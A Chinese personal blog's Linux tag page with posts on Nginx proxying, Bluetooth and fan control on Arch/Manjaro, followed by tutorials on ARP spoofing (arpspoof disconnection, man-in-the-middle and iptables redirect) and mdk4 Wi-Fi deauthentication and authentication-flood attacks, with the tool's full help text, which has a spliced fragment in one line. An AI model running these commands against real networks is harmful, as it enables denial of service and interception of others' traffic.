跳到主要内容

9 篇博文 含有标签「Linux」

Linux

查看所有标签

Nginx 部署超星学习通签到服务

· 阅读需 2 分钟
Hanasaki
Hanasaki
阿巴阿巴阿巴

在 AWS 的 EC2 服务器上部署了这玩意,一方面分散华为云那个服务器的压力,一方面体验一下部署在服务器的流程。之前一直都是静态网页部署+云函数,比较省事。

用的 PM2 运行的接口服务,端口号是 5000 ,可以直接通过域名+端口号访问接口,但是感觉这样不太优雅,干脆用 Nginx 代理一下。让网站可以通过 /chaoxing 路径访问,让接口可以通过 /chaoxing-api 来访问。

关于蓝牙的问题

· 阅读需 1 分钟

在 ArchLinux 中如何使用蓝牙耳机如何连接到电脑看视频、听歌。

  1. 安装 bluez,这个软件包提供蓝牙协议栈。
  2. 安装 bluez-utils,这个软件包提供 bluetoothctl 实用程序。
  3. 通用蓝牙驱动是 btusb 内核模块。检查模块是否已加载。如果还没有,先加载模块。
  4. 启动/启用 bluetooth.service。

命令:

yay -S bluez bluez-utils # 安装bluez和bluez-utils

lsmod | grep btusb #检查模块是否加载

modprobe btusb #加载模块

systemctl enable bluetooth #开机自启动蓝牙服务

通常这样就可以了,但是如果连不上去,尝试安装 pulseaudio-bluetooth,完成后重启,即可连上。

笔记本风扇速度管理

· 阅读需 2 分钟

这个问题真是困扰了多年,始终没解决。在使用 Manjaro、ChromeOS、Ubuntu 等系统时,都因为风扇转速太疯狂而回到 Windows。一直也没找到合适的解决方法,起初以为是双显卡的问题,以为是 Nvidia 显卡驱动没装好或者是一直在使用独显,今天终于知道是风扇控制策略的问题。每一个温度区间对应一个适合的风扇转速,而这些转速在 Linux 中默认设置的不太合适。

解决

安装 nbfc-linux,这是一个参考 nbfc 并改用C语言写的风扇管理程序。

WhatNBFC MonoNBFC Linux
PortabilityCrossplatformLinux
Configuration filesXML (956KB)JSON (840KB)
RuntimeMonoNative
Memory consumption (ps_mem)~50MB~350KB
Package size (pkg.tar.gz)448K100K
Service control rightsAny userOnly root
IPC ConceptTCP/IPFiles
IPC ProtocolBinaryJSON

安装该程序,然后可在 /usr/share/nbfc/configs/ 目录下,找到所有提供的配置文件。

yay -S nbfc-linux

选择一个最符合我笔记本的型号,我的电脑是AN515-54,在同类型笔记本中发现,AN715-51和我的配置相同。可以将 Acer Nitro AN715-51.json 作为我的配置。

在终端中运行以下命令:

# 设置该型号为当前配置
sudo nbfc config --set "Acer Nitro AN715-51"
# 启动风扇管理
sudo nbfc start
# 开机自动运行风扇管理服务
sudo systemctl enable nbfc_service

当启动风扇管理后,可以明显听到风扇的变化,问题解决。

Arp 攻击

· 阅读需 2 分钟

本篇内容仅用于学习和测试,本人遵纪守法。

安装

arpspoof 是 dsniff 包里的一个程序,可用于arp攻击。Manjaro 中执行以下命令安装这个软件包就可以使用了。

yay -S dsniff

介绍

arpspoof - 截获交换局域网中的数据包。

用法
      arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

描述
      arpspoof通过伪造的ARP响应包改变局域网中从目标主机(或所有主机)到另一个主机(host)的数据包转发路径。这是交换局域网中嗅探网络流量的一种极为有效的方法。
      内核IP转发(或如fragrouter这样的、用户层面的、能完成同样功能的软件)必须提前开启。

使用情景

1. 断网攻击,不开启流量转发,使用我的无线网卡 wlp8s0,攻击网关

sudo arpspoof -i wlp8s0 -t 192.168.1.1

2. 中间人攻击,截获用户和网关之间的流量

开启流量转发

echo 1 >> /proc/sys/net/ipv4/ip_forward

欺骗双方,充当中间人

sudo arpspoof -i wlp8s0 -t 192.168.1.1 192.168.1.106
sudo arpspoof -i wlp8s0 -t 192.168.1.106 192.168.1.1

此时网关以为我是106,而106以为我是网关。双方的流量都将经过这里,使用 WireShark 即可对经过网卡的流量进行分析。

3. 重定向攻击

使局域网所有设备访问的 80 端口,重定向到我这里的 8080 端口,需要开启流量转发。

sudo arpspoof -i wlp8s0 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Mdk4 无线攻击

· 阅读需 10 分钟

本篇内容仅用于学习和测试,本人遵纪守法。

Mdk3 已经不在维护,且它无法攻击 5Ghz 频段的 WiFi,而 Mdk4 加入了 5Ghz 频段的支持,当然用新不用旧。在实践中,WPA3 协议的 WIFI 对 Deauth 和泛洪攻击似乎免疫,多次尝试均是如此。而 WPA2 以及更低级的协议的 WIFI 能够轻易被攻击,产生显著效果。

安装

安装 aircrack-ngmdk4 ,Manjaro 可通过以下命令安装

yay -S aircrack-ng mdk4

使用

启用监听模式

sudo airmon-ng start wlp8s0

得到 wlp8s0mon 作为监听接口,执行攻击命令时均使用监听接口。

扫描无线网络

对 2.4Ghz 频段的 WiFi 扫描

sudo airodump-ng wlp8s0mon

对 5Ghz 频段的 WiFi 扫描,其中参数 a 表示 5Ghz 的 802.11a 标准,也可以是 bg ,分别代表 802.11b 和 802.11g,他俩的频段为 2.4 Ghz

sudo airodump-ng --band a wlp8s0mon

常用情景

Deauthentication 攻击,断掉信道为 11 无线网络的全部客户端连接。

sudo mdk4 wlp8s0mon d -c 11

身份验证攻击,攻击 BSSID 为 AE:15:5d:ad:40:9b 的接入点,使其崩溃重启

sudo mdk4 wlp8s0mon a -a AE:15:5d:ad:40:9b

攻击模式

一般也就用 a 和 d,用信标攻击太离谱太明显

ATTACK MODE b: Beacon Flooding
  Sends beacon frames to show fake APs at clients.
  This can sometimes crash network scanners and even drivers!
ATTACK MODE a: Authentication Denial-Of-Service
  Sends authentication frames to all APs found in range.
  Too many clients can freeze or reset several APs.
ATTACK MODE p: SSID Probing and Bruteforcing
  Probes APs and checks for answer, useful for checking if SSID has been correctly decloaked and if AP is in your sending range.
  Bruteforcing of hidden SSIDs with or without a wordlist is also available.
ATTACK MODE d: Deauthentication and Disassociation
  Sends deauthentication and disassociation packets to stations based on data traffic to disconnect all clients from an AP.
ATTACK MODE m: Michael Countermeasures Exploitation
  Sends random packets or re-injects duplicates on another QoS queue to provoke Michael Countermeasures on TKIP APs.
  AP will then shutdown for a whole minute, making this an effective DoS.
ATTACK MODE e: EAPOL Start and Logoff Packet Injection
  Floods an AP with EAPOL Start frames to keep it busy with fake sessions and thus disables it to handle any legitimate clients. Or logs off clients by injecting fake EAPOL Logoff messages.
ATTACK MODE s: Attacks for IEEE 802.11s mesh networks
  Various attacks on link management and routing in mesh networks
  Flood neighbors and routes, create black holes and divert traffic!
ATTACK MODE w: WIDS Confusion
  Confuse/Abuse Intrusion Detection and Prevention Systems by cross-connecting clients to multiple WDS nodes or fake rogue APs.
ATTACK MODE f: Packet Fuzzer
  A simple packet fuzzer with multiple packet sources and a nice set of modifiers. Be careful!
ATTACK MODE x: Poc Testing
  Proof-of-concept of WiFi protocol implementation vulnerability, to test whether the device has wifi vulnerabilities.
  It may cause the wifi connection to be disconnected or the target device to crash.

攻击参数

mdk4 <interface> <attack_mode> [attack_options]
mdk4 <interface in> <interface out> <attack_mode> [attack_options]
	ATTACK MODE b: Beacon Flooding
	  Sends beacon frames to generate fake APs at clients.
	  This can sometimes crash network scanners and drivers!
	      -n <ssid>
		 Use SSID <ssid> instead of randomly generated ones
	      -a
		 Use also non-printable caracters in generated SSIDs
		 and create SSIDs that break the 32-byte limit
	      -f <filename>
		 Read SSIDs from file
	      -v <filename>
		 Read MACs and SSIDs from file. See example file!
	      -t <adhoc>
		 -t 1 = Create only Ad-Hoc network
		 -t 0 = Create only Managed (AP) networks
		 without this option, both types are generated
	      -w <encryptions>
		 Select which type of encryption the fake networks shall have
		 Valid options: n = No Encryption, w = WEP, t = TKIP (WPA), a = AES (WPA2)
		 You can select multiple types, i.e. "-w wta" will only create WEP and WPA networks
	      -b <bitrate>
		 Select if 11 Mbit (b) or 54 MBit (g) networks are created
		 Without this option, both types will be used.
	      -m
		 Use valid accesspoint MAC from built-in OUI database
	      -h
		 Hop to channel where network is spoofed
		 This is more effective with some devices/drivers
		 But it reduces packet rate due to channel hopping.
	      -c <chan>
		 Create fake networks on channel <c		ATTACK MODE f: Packet Fuzzer
	  A simple packet fuzzer with multiple packet sources
	  and a nice set of modifiers. Be careful!han>. If you want your card to
		 hop on this channel, you have to set -h option, too.
	      -i <HEX>
		 Add user-defined IE(s) in hexadecimal at the end of the tagged parameters
	      -s <pps>
		 Set speed in packets per second (Default: 50)

	ATTACK MODE a: Authentication Denial-Of-Service
	  Sends authentication frames to all APs found in range.
	  Too many clients can freeze or reset several APs.
	      -a <ap_mac>
		 Only test the specified AP
	      -m
		 Use valid client MAC from built-in OUI database
	      -i <ap_mac>
		 Perform intelligent test on AP
		 This test connects clients to the AP and reinjects sniffed data to keep them alive.
	      -s <pps>
		 Set speed in packets per second (Default: unlimited)

	ATTACK MODE p: SSID Probing and Bruteforcing
	  Probes APs and checks for answer, useful for checking if SSID has
	  been correctly decloaked and if AP is in your sending range.
	  Bruteforcing of hidden SSIDs with or without a wordlist is also available.
	      -e <ssid>
		 SSID to probe for
	      -f <filename>
		 Read SSIDs from file for bruteforcing hidden SSIDs
	      -t <bssid>
		 Set MAC address of target AP
	      -s <pps>
		 Set speed (Default: 400)
	      -b <character sets>
		 Use full Bruteforce mode (recommended for short SSIDs only!)
		 You can select multiple character sets at once:
		 * n (Numbers:   0-9)
		 * u (Uppercase: A-Z)
		 * l (Lowercase: a-z)
		 * s (Symbols: ASCII)
	      -p <word>
		 Continue bruteforcing, starting at <word>.
	      -r <channel>
		 Probe request tests (mod-musket)

	ATTACK MODE d: Deauthentication and Disassociation
	  Sends deauthentication and disassociation packets to stations
	  based on data traffic to disconnect all clients from an AP.
	      -w <filename>
		 Read file containing MACs not to care about (Whitelist mode)
	      -b <filename>
		 Read file containing MACs to run test on (Blacklist Mode)
	      -s <pps>
		 Set speed in packets per second (Default: unlimited)
	      -x
		 Enable full IDS stealth by matching all Sequence Numbers
		 Packets will only be sent with clients' addresses
	      -c [chan,chan,...,chan[:speed]]
		 Enable channel hopping. When -c h is given, mdk4 will hop an all
		 14 b/g channels. Channel will be changed every 3 seconds,
		 if speed is not specified. Speed value is in milliseconds!
	      -E <AP ESSID>
		 Specify an AP ESSID to attack.
	      -B <AP BSSID>
		 Specify an AP BSSID to attack.
	      -S <Station MAC address>
		 Specify a station MAC address to attack.
		  -W <Whitelist Station MAC address>
		 Specify a whitelist station MAC.

	ATTACK MODE m: Michael Countermeasures Exploitation
	  Sends random packets or re-injects duplicates on another QoS queue
	  to provoke Michael Countermeasures on TKIP APs.
	  AP will then shutdown for a whole minute, making this an effective DoS.
	      -t <bssid>
		 Set target AP, that runs TKIP encryption
	      -j
		 Use the new QoS exploit which only needs to reinject a few packets instead
		 of the random packet injection, which is unreliable but works without QoS.
	      -s <pps>
		 Set speed in packets per second (Default: 400)
	      -w <seconds>
		 Wait <seconds> between each random packet burst (Default: 10)
	      -n <count>
		 Send <count> random packets per burst (Default: 70)

	ATTACK MODE e: EAPOL Start and Logoff Packet Injection
	  Floods an AP with EAPOL Start frames to keep it busy with fake sessions
	  and thus disables it to handle any legitimate clients.
	  Or logs off clients by injecting fake EAPOL Logoff messages.
	      -t <bssid>
		 Set target WPA AP
	      -s <pps>
		 Set speed in packets per second (Default: 400)
	      -l
		 Use Logoff messages to kick clients

	ATTACK MODE s: Attacks for IEEE 802.11s mesh networks
	  Various attacks on link management and routing in mesh networks.
	  Flood neighbors and routes, create black holes and divert traffic!
	      -f <type>
		 Basic fuzzing tests. Picks up Action and Beacon frames from the air, modifies and replays them:
		 The following modification types are implemented:
		 1: Replay identical frame until new one arrives (duplicate flooding)
		 2: Change Source and BSSID (possibly resulting in Neighbor Flooding)
		 3: Cut packet short, leave 802.11 header intact (find buffer errors)
		 4: Shotgun mode, randomly overwriting bytes after header (find bugs)
		 5: Skript-kid's automated attack trying all of the above randomly :)
	      -b <impersonated_meshpoint>
		 Create a Blackhole, using the impersonated_meshpoint's MAC address
		 mdk4 will answer every incoming Route Request with a perfect route over the impersonated node.
	      -p <impersonated_meshpoint>
		 Path Request Flooding using the impersonated_meshpoint's address
		 Adjust the speed switch (-s) for maximum profit!
	      -l
		 Just create loops on every route found by modifying Path Replies
	      -s <pps>
		 Set speed in packets per second (Default: 100)
	      -n <meshID>
		 Target this mesh network

	ATTACK MODE w: WIDS Confusion
	  Confuse/Abuse Intrusion Detection and Prevention Systems by
	  cross-connecting clients to multiple WDS nodes or fake rogue APs.
	  Confuses a WDS with multi-authenticated clients which messes up routing tables
	      -e <SSID>
		 SSID of target WDS network
	      -c [chan,chan,...,chan[:speed]]
		 Enable channel hopping. When -c h is given, mdk4 will hop an all
		 14 b/g channels. Channel will be changed every 3 seconds,
		 if speed is not specified. Speed value is in milliseconds!
	      -z
		 activate Zero_Chaos' WIDS exploit
		 (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
	      -s <pps>
		 Set speed in packets per second (Default: 100)

	ATTACK MODE f: Packet Fuzzer
	  A simple packet fuzzer with multiple packet sources
	  and a nice set of modifiers. Be careful!
	  mdk4 randomly selects the given sources and one or multiple modifiers.
	      -s <sources>
		 Specify one or more of the following packet sources:
		 a - Sniff packets from the air
		 b - Create valid beacon frames with random SSIDs and properties
		 c - Create CTS frames to broadcast (you can also use this for a CTS DoS)
		 p - Create broadcast probe requests
	      -m <modifiers>
		 Select at least one of the modifiers here:
		 n - No modifier, do not modify packets
		 b - Set destination address to broadcast
		 m - Set source address to broadcast
		 s - Shotgun: randomly overwrites a couple of bytes
		 t - append random bytes (creates broken tagged parameters in beacons/probes)
		 c - Cut packets short, preferably somewhere in headers or tags
		 d - Insert random values in Duration and Flags fields
	      -c [chan,chan,...,chan[:speed]]
		 Enable channel hopping. When -c h is given, mdk4 will hop an all
		 14 b/g channels. Channel will be changed every 3 seconds,
		 if speed is not specified. Speed value is in milliseconds!
	      -p <pps>
		 Set speed in packets per second (Default: 250)
	
	ATTACK MODE x: Poc Testing
	  Proof-of-concept of WiFi protocol implementation vulnerability,
	  to test whether the device has wifi vulnerabilities.
	  It may cause the wifi connection to be disconnected or the target device to crash.
	  	  -s <pps>
		   Set speed in packets per second (Default: unlimited)
		  -c [chan,chan,...,chan[:speed]]
		  	Enable channel hopping. When -c h is given, mdk4 will hop an all
			14 b/g channels. Channel will be changed every 3 seconds,
			if speed is not specified. Speed value is in milliseconds!
		  -v <vendor>
		    file name in pocs dir, default test all.
		  -A <AP MAC>
		    set an AP MAC
		  -S <Station MAC>
		    set a station MAC.